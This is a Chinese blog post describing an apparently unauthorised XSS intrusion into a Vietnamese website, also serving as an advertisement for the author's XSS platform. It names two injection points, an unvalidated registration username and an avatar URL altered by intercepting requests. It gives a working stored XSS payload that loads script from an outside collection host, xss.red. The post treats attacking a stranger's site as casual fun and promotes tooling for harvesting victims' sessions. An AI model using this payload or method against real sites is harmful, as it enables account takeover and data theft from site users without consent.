记一次通过 XSS 漏洞渗透越南站

Mr.Wu 1,790 2 正在检测是否收录...

很久没更新博客了呢,突然发现不知道从啥时候开始,本站的 XSS 平台也没有了新用户注册了;
于是有了今天这篇科普文,来给大家秀下本站的 XSS 平台呢~[aru_3][aru_3]

记一次通过 XSS 漏洞渗透越南站

开局一张图。。。
我也不知道这是个啥站,一堆鸟文看不懂,不过不影响咱们插他。

有2个地方可以插,一个是会员注册,不懂为什么对用户名没有进行格式验证:
记一次通过 XSS 漏洞渗透越南站

第二个地方是注册登录后,用户信息修改-头像修改处,不能自定义头像,但是可以选择自带的一些头像,因此通过抓包修改图片的地址即可:
记一次通过 XSS 漏洞渗透越南站
记一次通过 XSS 漏洞渗透越南站
payload:

"><sCRiPt/SrC=//xss.red/b>

接下来到了本文的重要环节了,本站的 XSS 平台广告时间~[aru_17][aru_17]
记一次通过 XSS 漏洞渗透越南站
记一次通过 XSS 漏洞渗透越南站
记一次通过 XSS 漏洞渗透越南站
记一次通过 XSS 漏洞渗透越南站

是不是简洁方便易看易操作?[aru_13][aru_13]
模块我就不秀了,没啥好看的,支持自定义模块,所以想要啥模块自己添加就行了。都一个样~

打赏
发表评论 取消回复
表情 图片 链接 代码

  1. 古道博客

    大佬,xss平台是哪个站

分享
微信
微博
QQ